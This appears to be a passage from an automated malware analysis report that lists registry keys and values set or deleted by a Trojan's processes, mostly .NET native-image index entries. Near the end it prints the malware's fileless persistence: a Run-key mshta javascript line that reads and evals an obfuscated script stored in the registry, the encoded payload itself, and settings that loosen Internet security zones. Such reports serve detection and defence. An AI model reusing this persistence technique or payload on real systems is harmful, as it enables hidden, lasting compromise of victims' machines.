[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2284 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"MVID" = "F0 07 EE 1B F5 48 BA 76 1B A6 16 F4 C3 5B 15 8E"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\6abb48d8\39\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\41470f34\2\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\168b424e\2b\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigString" = "ZAP--0000-0000"
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"SIG" = "1D 3D FC F9 F8 82 BC 47 B7 60 1D 39 80 29 76 15"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"DisplayName" = "Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF E1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 4D 6D 00 FD F4 D5 28 53 D9 CB 8D 45 C2 6C 6D"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5bec2d27\3eff7be6\5e]
"ConfigMask" = "4361"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "92"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67]
"LastModTime" = "C8 72 10 C0 AB F3 D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\6fc4440f\67\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\638045d1\2c\InvertDependencies\5bec2d27\3eff7be6]
"5e" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
The process mscorsvw.exe:3484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "26 AE 1D EF 6C 2D 88 D8 76 C0 1D 10 D7 D2 5E E6"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2168 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F 00 35 84 DF A4 99 38 7B 60 2A D5 07 4D C9 EB"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
The process mscorsvw.exe:2072 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigMask" = "4361"
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"SIG" = "EC BB F6 79 DE 07 9A 4F A7 CE DF 48 D6 49 CE 93"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"LastModTime" = "2C BB 9A C0 AB F3 D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7ac727df\3ef4663b\f\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\2c28124a\68]
"DisplayName" = "Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "46 38 81 A1 6C C7 C9 19 E6 64 2E 68 D9 A2 6B 20"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "91"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d88ef29\1c74b768\5f]
"MVID" = "13 FC 3D AE F5 85 09 8F 11 91 1F 8F 72 AC 1C EA"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5b]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF C1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\7ac727df\3ef4663b]
"F" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\5d88ef29\1c74b768]
"5f" = ""
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index59]
The process mscorsvw.exe:3084 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"LastModTime" = "44 C8 29 C1 AB F3 D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"SIG" = "5D B3 1D FA D7 A3 2D 4A 9D D3 B0 41 D1 BC 36 E6"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"LastModTime" = "B8 14 B1 BF AB F3 D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"Status" = "4098"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"DisplayName" = "System.Management.Automation,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MissingDependencies" = "Microsoft.BackgroundIntelligentTransfer.Management.Interop,6.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"MVID" = "FD 3E DC DF A9 CE 60 AB AC 35 20 81 46 18 44 95"
"ConfigMask" = "4361"
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A1 27 1B FE ED E6 AE 9E E4 D6 4F B9 AA 92 DA 70"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5a]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF 81"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "90"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a]
"DisplayName" = "Microsoft.BackgroundIntelligentTransfer.Management,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61]
"SIG" = "85 42 9C 0A C5 DF B1 48 A5 8E 44 2E FB 91 9D 84"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\736e1f8\4a6241f9\5a\InvertDependencies\2042d09e\663d72dd]
"60" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\2042d09e\663d72dd\60]
"Status" = "2"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index58]
The process mscorsvw.exe:2408 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 CD 79 1E C6 15 7A 89 BF B0 25 7A 2D 1E 6F F6"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
The process mscorsvw.exe:828 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigString" = "ZAP--0000-0000"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"
"Status" = "4098"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\LocalService\Application Data"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"SIG" = "3C 55 A6 91 EF 61 21 4C 93 C9 D8 16 A5 41 D7 5A"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\7809dff3\61\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\291a02d0\7\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"ConfigMask" = "4361"
"ILDependencies" = "7F 93 69 55 F3 DF 09 78 61 00 00 00 01 00 00 00"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\30bc7c4f\1d498232]
"8" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"DisplayName" = "Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\3c74e9a9\1\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"MVID" = "DC 19 F5 0C 5E 84 E7 22 34 33 CC 70 9E 7E B4 3F"
"Status" = "0"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"ILUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF FF F1"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\1d498232\8\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 25 DD 5E 6E 4B B4 85 04 B3 3B 26 95 D9 C9 97"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5e]
"NIUsageMask" = "FF FF FF FF FF FF FF FF FF FF FF F9"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\30041bb6\4c\InvertDependencies\13b06edc\1367089b]
"5c" = ""
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"LatestIndex" = "94"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\17ba5869\65]
"LastModTime" = "1A 26 E3 BF AB F3 D0 01"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32]
"SystemStoreChangeId" = "209"
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\13b06edc\1367089b\5c]
"NIDependencies" = "C6 38 19 18 A9 E9 74 3C 01 00 00 00 02 00 00 00"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index5c]
The process regsvr32.exe:3384 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CA 61 CF CB 61 1C 26 88 90 15 8E 95 57 35 E8 DA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKCU\Software\Microsoft\Urfapo]
"Awxi" = "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
The process regsvr32.exe:3264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\e307dfcb0a]
"099fdde6" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION]
"regsvr32.exe" = "8888"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"2300" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"mshta javascript:nGqU8fhUg5=Fh69Ffs;r49L=new ActiveXObject(WScript.Shell);fZR7QqjRn3=8Sz6E;I2tCE2=r49L.RegRead(HKLM\\software\\e307dfcb0a\\5119f545);zOYw9cby=4io;eval(I2tCE2);jXFqs0MMa=Ua;o."
[HKCU\Software\e307dfcb0a]
"099fdde6" = "1"
[HKLM\SOFTWARE\e307dfcb0a]
"f4ea4294" = "865"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\e307dfcb0a]
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\fadehi\fadehi.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\e307dfcb0a]
"e91fe739" = "%Documents and Settings%\%current user%\Local Settings\Application Data\fadehi\fadehi.exe"
"5232108f" = "ÈwûFª2°p~,¤eÅ’@Èú×¼H«€â’™å- î¬l«•ðøïw·(¿é燧,ÂK«8GÃÂt9mFù„zËœ-ßô‚]ꨧÖ×mà`fhêç‡/«ÂÂhܰremIèÑyDÈ6 ˆŸGâ€ÂôÂÂ?1ËœußXV@@¿°2iVT©ÂÂÃÂãà¯ÉÛ)ŠÕ9NÅ“J:4Ã’Å m¸¾ ¢7G¯Åü•ÇÌM¦M\‰õÌgPshŒäùgi5&â€ÂÂÂ𮨩(;°REøÂ¸[>œ–.kZnv)8iÕBû.V±38U‚H- ÕøGá=ž=B±‡uÕµyáCÂÂ91wo{¢Aû8ÂÂoò¨ƒ@‹^×ÃÂdð2žë~GU¹ÿš@Čլ7fQ0.,ˆ|ÃûЦYÙ]½oes¶‹´"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\e307dfcb0a]
"5119f545" = "LYadYVJLPJ6WFfkaGJmh1WqO=90dkhY45AlhE0gMXxkNmqXwE8e2txGDSBsQMhqnNDOde3U7APQ2AdzFaFQyAjcWRkMGtNkEinSrCp9WEJNa7mP3KdBAcqeouzXMuRbzg99c;PlJgsEhUsHCleD6ghacNrUC=S3L11WmVIXP5YjCibX0UhQDUuLZbmZaMWqkeI2vZev7xCrBSnKue;SeKSu6wcaioFvLSwT3jIuPkz=x1BSabs3aKbNrsKO4v3nrWjVGLHZciGKw89gNSBGTBBHsJsx53bTvqNFyHp4CVCQnInJGCzeEpc9ZHSG;fZAEAKboFDB25oUyYzMQrGMFM=k6s2nq55NWdxAmzlsPornZgTYWNhitD8b9zxSACaPLgO6mE0bsuNBgiInfNMbL0squyGNMEqnbuEs2nT8HqHtlYYPaLnBU1KowDo8vcu3;zLZkci9uF0HlfZQJIeFVSi=F7Nsr9WmKoz44DK4qikwPA5kJqVXfPDTrAfrv2mSRfEjj3hLSb8KZE7tzaqNP6PFuU9DAw;G4pjOlwUamMdAQLhlJz=SlRjoYB5xvr4BkB8nPlXmHhtHRBMxCsSSs9JehH7PQQ3V;XIiOntCrABujiSqWQ3w=rFcHYIJYtMQDxtZ22uBbpL2jQhUJ2EnpdpeQ3G;kowKgLTtT6IMWApdSHika=JJj0qxRd0hjt5wx5b298ADjcNYZtwMruR8EAUTYflkEZKJF2ehzgpB4s7Y2dAQcJ3DkhI79Dd1r6Xra89BjP4eqU73Klo42I4YfR0d5xBkwn0MBIjKijHAhRZwLSzW5;oPLZpDtij9TZchaPfTkpADOw=9KJwm6xKi1wrFiYP3nXhozkCxVnIZ03VBZL04i6b7rmihZEFf8OsRncdKM6Kmq6cyZt5FkiWaxhchVPoTTiW5RUMmxzgnMRan6XudDZYJI1AKyKPkmQhEN0wpyPD7uEk3Qda;qZj1=2B083C3F6D760F02321317631."
"8d8063dd" = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"1206" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1809" = "3"
[HKCU\Software\e307dfcb0a]
"f4ea4294" = "865"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
